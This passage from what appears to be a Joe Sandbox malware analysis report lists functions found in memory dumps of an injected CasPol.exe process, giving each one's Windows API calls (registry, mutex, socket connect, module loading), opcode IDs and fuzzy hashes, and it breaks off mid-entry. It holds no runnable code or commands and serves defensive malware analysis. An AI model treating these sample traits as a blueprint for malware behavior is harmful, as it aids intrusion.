                                          • Instruction Fuzzy Hash: 23317F76509780AFE712CB21DC44F92BFB8EF06214F0984DAE9858B193D265E909CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32279 Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateMutexW.KERNEL32(?,?), ref: 1FE32319
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID:
                                          • API String ID: 1964310414-0
                                          • Opcode ID: 2c899c059ba501a52fc91bdf628be7287e27dfe40b208126117de1370131cf30
                                          • Instruction ID: 3334ee5b02b8b0314416ce5d58eb396c6d73962c4683a650d77ac3d3c4ab08a5
                                          • Opcode Fuzzy Hash: 2c899c059ba501a52fc91bdf628be7287e27dfe40b208126117de1370131cf30
                                          • Instruction Fuzzy Hash: D13141B1509380AFE711CB65DC85F56FBA8EF05214F09859AE984CF292D375A904CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31305 Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExW.KERNEL32(?,00000EA4,?,?), ref: 1FE313B6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Enum
                                          • String ID:
                                          • API String ID: 2928410991-0
                                          • Opcode ID: f437818202e909901048f93bd5b7fcb8936525634250d8b20ecb9d5c320a340d
                                          • Instruction ID: cec641a0e4755289992507f44083ae725224f41dee8887b9ddd39096f00044f0
                                          • Opcode Fuzzy Hash: f437818202e909901048f93bd5b7fcb8936525634250d8b20ecb9d5c320a340d
                                          • Instruction Fuzzy Hash: CC31616254E3C06FD3138B358C65A11BF74AF47610B0D84CBD884CF1A3D225A919D7B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3340E Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          • getaddrinfo.WS2_32(?,00000EA4), ref: 1FE334B3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: getaddrinfo
                                          • String ID:
                                          • API String ID: 300660673-0
                                          • Opcode ID: d0a26439db16a27b4ccc8f23f87b1c1aca4314f8804cb1927f87be07898b33aa
                                          • Instruction ID: db868a477db40726878696a9a597188408d6bb068e648e372ed708c250dd00c7
                                          • Opcode Fuzzy Hash: d0a26439db16a27b4ccc8f23f87b1c1aca4314f8804cb1927f87be07898b33aa
                                          • Instruction Fuzzy Hash: F021D1B1500304AFF721DB64DD89FA6F7ACEF04310F04895AFA489B281D675A945CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE313E2 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE31476
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 8101dbdb5b22ef7421518464122b0f5b4891421fe16fb459228da4c0aad4a252
                                          • Instruction ID: 9af1a4e9c4f77c0eaadedb868f082401f2587e23aed321f29eb072b65cad2200
                                          • Opcode Fuzzy Hash: 8101dbdb5b22ef7421518464122b0f5b4891421fe16fb459228da4c0aad4a252
                                          • Instruction Fuzzy Hash: EC219FB2505384AFE7218F64DC49F66FFB8EF45310F08859AF984DB292D265E808CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE329A0 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenCurrentUser.KERNEL32(?,00000EA4), ref: 1FE32A39
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CurrentOpenUser
                                          • String ID:
                                          • API String ID: 1571386571-0
                                          • Opcode ID: e1ee57493d863668cc33b8c6f32c732c9492bba86cddbaffc93f4317cb69ccae
                                          • Instruction ID: 72b66eee4195560578cfc2feb56473bd6a4f2d56c31d887f8324dbec90399df3
                                          • Opcode Fuzzy Hash: e1ee57493d863668cc33b8c6f32c732c9492bba86cddbaffc93f4317cb69ccae
                                          • Instruction Fuzzy Hash: 1321E1B1409384AFE7128B24DC45F66FFB8EF46314F08849BE9849F193D264A909CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32B9A Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegNotifyChangeKeyValue.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32C44
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeNotifyValue
                                          • String ID:
                                          • API String ID: 3933585183-0
                                          • Opcode ID: dd56e4ac61c525753117db2f2cba8583605afd6329f04c7af080f574db567bd9
                                          • Instruction ID: ecbc325448b6dc53ca5262256d7b3a2934c8c1d3adff9a08a7bad5fb5d410b32
                                          • Opcode Fuzzy Hash: dd56e4ac61c525753117db2f2cba8583605afd6329f04c7af080f574db567bd9
                                          • Instruction Fuzzy Hash: 6531C372405784AFEB12CB10DC88F96FFB8EF46314F08859AE9849F153D275A509CBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45ADE5 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                          • K32GetModuleInformation.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45AE76
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: InformationModule
                                          • String ID:
                                          • API String ID: 3425974696-0
                                          • Opcode ID: b6a9388dfcac7b727266b4c85822e945118e0ddb372b169a546d7b216b062100
                                          • Instruction ID: 22f0b8379738283f204e9ffdb807af8613039641f259b919a84c428435fd2836
                                          • Opcode Fuzzy Hash: b6a9388dfcac7b727266b4c85822e945118e0ddb372b169a546d7b216b062100
                                          • Instruction Fuzzy Hash: 58219171545384AFE712CB11DC85F67FFACEF46210F08849AE985DB252D264E848CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32370 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                          Download Yara Rule
                                          APIs
                                          • shutdown.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32404
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: shutdown
                                          • String ID:
                                          • API String ID: 2510479042-0
                                          • Opcode ID: 3ed454d5a060a3dd03b13bc89515911107f8c57e774c681349d1215c655f1b8e
                                          • Instruction ID: a127d24b54b6ab19d3b2c3bbc27850883ca186dbce459a4f283c9b07c880d929
                                          • Opcode Fuzzy Hash: 3ed454d5a060a3dd03b13bc89515911107f8c57e774c681349d1215c655f1b8e
                                          • Instruction Fuzzy Hash: 0C210875404380AFE712CF10DC85F56FFB8EF46320F1884DAE9849F193D265A909CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45AEDC Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                          Download Yara Rule
                                          APIs
                                          • K32GetModuleBaseNameW.KERNEL32(?,00000EA4,?,?), ref: 1D45AF82
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: BaseModuleName
                                          • String ID:
                                          • API String ID: 595626670-0
                                          • Opcode ID: fa4aa981389b96b5e6493158281d7f0289afba10d3ac70a1af19ddfd8339599a
                                          • Instruction ID: 9bfb56ca243f8658e4fe9ff9b3db8dd24042f26960b18d46879edfa23f182835
                                          • Opcode Fuzzy Hash: fa4aa981389b96b5e6493158281d7f0289afba10d3ac70a1af19ddfd8339599a
                                          • Instruction Fuzzy Hash: 2C21A2715093C0AFD312CB65CC55B66BFB4EF47210F0984DBD8848F193D624A909CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32454 Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessTimes.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE324DD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ProcessTimes
                                          • String ID:
                                          • API String ID: 1995159646-0
                                          • Opcode ID: 3526d74a12196bef300ff34ddf80d9964a24bbe852258a6eeb76fa4be7585711
                                          • Instruction ID: 6050b86e720f9ee72134a8e991d8c126e1ac5f68fa6fdd29b2a6a64feafe66e2
                                          • Opcode Fuzzy Hash: 3526d74a12196bef300ff34ddf80d9964a24bbe852258a6eeb76fa4be7585711
                                          • Instruction Fuzzy Hash: EC21A171505780AFEB128F50DC88F56FFB8EF06310F08849AF9859F192D225A409CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31EE2 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenFileMappingW.KERNELBASE(?,?), ref: 1FE31F6D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileMappingOpen
                                          • String ID:
                                          • API String ID: 1680863896-0
                                          • Opcode ID: a24d23b71d9941430837d01c26c0e1ae2e82ad2928cdd64e870ceab30e41e230
                                          • Instruction ID: d6c6ea2b8100e43f23b21c5f739fa3b3587993a88087781f9e3eda9ee256d56b
                                          • Opcode Fuzzy Hash: a24d23b71d9941430837d01c26c0e1ae2e82ad2928cdd64e870ceab30e41e230
                                          • Instruction Fuzzy Hash: 0A2171B1509380AFE711CB65DC45F56FBB8EF05224F0885AEE9848F292D375E908CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32AC6 Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE32B45
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 76895a968ef5d4c255de3fc19d03c721dfd429af8650ad55442874b4cf26e44b
                                          • Instruction ID: 6dcb5763063f174a59c8375524df4737855572e8a82cd8fc8a0cfa8f209b964c
                                          • Opcode Fuzzy Hash: 76895a968ef5d4c255de3fc19d03c721dfd429af8650ad55442874b4cf26e44b
                                          • Instruction Fuzzy Hash: 7F219072900344AFF711DF64DD89F6AF7ACEF04711F04855AE9849B241D634E408CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A722 Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 1D45A7BE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: 26f1227b147b30bf89f081515bb689fa9f5ab2e89b1cc6d48d9f477b7251b668
                                          • Instruction ID: f153ce75e81fc244433e0cece565c8985962559ae4627faa185d6a119a76865b
                                          • Opcode Fuzzy Hash: 26f1227b147b30bf89f081515bb689fa9f5ab2e89b1cc6d48d9f477b7251b668
                                          • Instruction Fuzzy Hash: 8021F8755093C06FD3138B25CC51B62BFB8EF87610F0981CBE8848B693D2656919C7B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3056E Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 1FE305ED
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 7729a4e0c6b601bb0cf6c26c299c4a767bf15cd735bcf4c6d1d9afca9e26c7f5
                                          • Instruction ID: 6bd5380f36c4e9d3cd1f17cad95dfafbca87cf4964f125dda0d33ba5518ce1a6
                                          • Opcode Fuzzy Hash: 7729a4e0c6b601bb0cf6c26c299c4a767bf15cd735bcf4c6d1d9afca9e26c7f5
                                          • Instruction Fuzzy Hash: BE217C71500240AFE721CF69DD89B56FBE8EF08214F04856AEA889B692E371F504CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31D52 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                          Download Yara Rule
                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EA4), ref: 1FE31DC3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID:
                                          • API String ID: 3907675253-0
                                          • Opcode ID: 70a617cfc4eae6557a22e0588b8ead2e39276d8d0cf253841c38153f77d35cbe
                                          • Instruction ID: 602f2350980588f04c7206ef4565f111da1d9ff7ca66cc9fb21421e0652371b2
                                          • Opcode Fuzzy Hash: 70a617cfc4eae6557a22e0588b8ead2e39276d8d0cf253841c38153f77d35cbe
                                          • Instruction Fuzzy Hash: 1521CF72900344AFFB10DF29DC89B6AFBACEF44321F04856AE945DB241D274E804CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31A0F Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                          Download Yara Rule
                                          APIs
                                          • setsockopt.WS2_32(?,?,?,?,?), ref: 1FE31A8C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: setsockopt
                                          • String ID:
                                          • API String ID: 3981526788-0
                                          • Opcode ID: 58b33293847afc668ab86dd9305e45d9d0b8dc9caa8757310d0546565063668e
                                          • Instruction ID: 6452b9a129ab25bbc9f135af7ebcece9068a70345eefc2bc925af21db12a57f4
                                          • Opcode Fuzzy Hash: 58b33293847afc668ab86dd9305e45d9d0b8dc9caa8757310d0546565063668e
                                          • Instruction Fuzzy Hash: 22219F724093C0AFD7128F65DC54AA2BFB4EF07325F0985DBE8C48F163D2259849CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45BE8C Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(?,00000EA4), ref: 1D45BF27
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 94b9699c6139b9d5bd9533b6443fb7f6fad5d54971ee12788fe6d46e981376af
                                          • Instruction ID: 26998a80cfd515f0bbcdb2b5dcb185955be70f7bc8b5aa5c8f7619fa141fe81c
                                          • Opcode Fuzzy Hash: 94b9699c6139b9d5bd9533b6443fb7f6fad5d54971ee12788fe6d46e981376af
                                          • Instruction Fuzzy Hash: A721C875049380AFE712CB11CC85F92FFB8DF46320F1880DAF9889F192D265A949CB76
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A54A Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1D45A5C9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: b087ee59c7cc4b32e60304c335e4f36a0bbfae136bc47288daf460ecd570d85f
                                          • Instruction ID: 0bef1b313461653e228c49ce02df2e93d3f1a98e9ab4483303370ddde03767d0
                                          • Opcode Fuzzy Hash: b087ee59c7cc4b32e60304c335e4f36a0bbfae136bc47288daf460ecd570d85f
                                          • Instruction Fuzzy Hash: F8219F72500704AFF721DA55DD85F6BFBACEF08620F04855AF9458B241D674E9098BB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32CC6 Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE32D3A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: fa6258f3a904ee7e39d45176558708b48a968d177c2014c45ec19ed4a984a476
                                          • Instruction ID: bb020e179ebbb6e1230821863d72e4ce23c92c9d3b6c10b4c6818a96b13e983b
                                          • Opcode Fuzzy Hash: fa6258f3a904ee7e39d45176558708b48a968d177c2014c45ec19ed4a984a476
                                          • Instruction Fuzzy Hash: 0521A1B2900344AFF7219F64DD49F6AFBACEF44711F04895AED849B241D274E809CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE335BE Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetAdaptersAddresses.IPHLPAPI(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE3364D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: AdaptersAddresses
                                          • String ID:
                                          • API String ID: 2506852604-0
                                          • Opcode ID: 2298bf4dfac8e0bf132d7e02dd9f79871488de75584b47ff184fff72c2e66dd4
                                          • Instruction ID: 4e320e31881c29c27994f314c84b34cca028e875ef7799cbfcacf20b6f1fa9c4
                                          • Opcode Fuzzy Hash: 2298bf4dfac8e0bf132d7e02dd9f79871488de75584b47ff184fff72c2e66dd4
                                          • Instruction Fuzzy Hash: 0C21A1754097C0AFE7128B11DC84F96FFB8EF46310F08858AE9858F293D265A908CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3094E Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE309CD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: d728c4b268d716ec99de35024aff4096d0927571d85f0342511bca0c0f75afb7
                                          • Instruction ID: 25b53a4c403c860ccb0510df22b8f8a5d2b580fb90ea8aea509f525e5ac19edf
                                          • Opcode Fuzzy Hash: d728c4b268d716ec99de35024aff4096d0927571d85f0342511bca0c0f75afb7
                                          • Instruction Fuzzy Hash: D421CFB2404380AFE722CF51DC84FA7FFACEF45320F04849AF9849B152D265A808CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31402 Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE31476
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 35d9e13f9b03a0a60db2e62c9914cca076bfab4e2d57acb54201a332b9c69565
                                          • Instruction ID: 76f07f53eb9cb194fab302be87dae61bc83a8534f4cb3d2e92afbae900403b53
                                          • Opcode Fuzzy Hash: 35d9e13f9b03a0a60db2e62c9914cca076bfab4e2d57acb54201a332b9c69565
                                          • Instruction Fuzzy Hash: FC216D72900344AFF7209F65DD89F6AFBA8EF48725F08855AED449B241D279E804CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32806 Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAEventSelect.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE3288A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: EventSelect
                                          • String ID:
                                          • API String ID: 31538577-0
                                          • Opcode ID: 4a763c448593806ff5391ee69e68d4f41b220e808dbb69903bf8db1ac2b91412
                                          • Instruction ID: cc511cb6d1f4f6627016a4b41a36da302ec1c438ab027f8f74edb5e57847e68e
                                          • Opcode Fuzzy Hash: 4a763c448593806ff5391ee69e68d4f41b220e808dbb69903bf8db1ac2b91412
                                          • Instruction Fuzzy Hash: AC217CB2404384AFE712CB51DD88F97FBACEF45320F0884ABE9849B142D264A508CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE322A6 Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateMutexW.KERNEL32(?,?), ref: 1FE32319
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID:
                                          • API String ID: 1964310414-0
                                          • Opcode ID: bb003fc9b4d7a7dc9efc34a57a1a8df8397fe3537500d8de18b0b778981066f6
                                          • Instruction ID: 153c883a20edfd201d753ec01c780714fc984e7999a9dce177d09461e70b210b
                                          • Opcode Fuzzy Hash: bb003fc9b4d7a7dc9efc34a57a1a8df8397fe3537500d8de18b0b778981066f6
                                          • Instruction Fuzzy Hash: 58217C71904240AFF710DF29DD89B56FBE8EF08614F04C5AAE9848F281D675F904CA66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32646 Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAIoctl.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE326C1
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Ioctl
                                          • String ID:
                                          • API String ID: 3041054344-0
                                          • Opcode ID: cfb3777b97d598b0f2689a8ab5cc6551888857fea9d5dec6a5024ff14c30b81b
                                          • Instruction ID: 3d1156cc539282ef1d3e112be382d59df8473966b0502f0cb6a7ea5212605c26
                                          • Opcode Fuzzy Hash: cfb3777b97d598b0f2689a8ab5cc6551888857fea9d5dec6a5024ff14c30b81b
                                          • Instruction Fuzzy Hash: 93218B76500644EFEB21CF11DD88FA6FBE8EF08711F04856AED858B252D671F848CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE328D4 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                          • RasConnectionNotificationW.RASAPI32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32963
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ConnectionNotification
                                          • String ID:
                                          • API String ID: 1402429939-0
                                          • Opcode ID: 0ed218be6f06fdbadc270f896833bc447e7f7eae81a367a6ab8cc5f19fb422e9
                                          • Instruction ID: ecda35cb44bb26f64f2ad1a2b8b6c56e00c3ee1480893c004ef2554a54c8cb13
                                          • Opcode Fuzzy Hash: 0ed218be6f06fdbadc270f896833bc447e7f7eae81a367a6ab8cc5f19fb422e9
                                          • Instruction Fuzzy Hash: 8A21C2B54097C4AFE7128B10DC85F66FFB8EF46314F09849AE9849F193D265A908CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3368A Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 1FE3370E
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Connect
                                          • String ID:
                                          • API String ID: 3144859779-0
                                          • Opcode ID: eb4773deea6462ad7b3632e5b9866a7524a8843153bfc22befdd667b015b1dad
                                          • Instruction ID: 221bbca703bc22803f6646b8008f53d11c3e171d5c0e787a4ce71a72185328d7
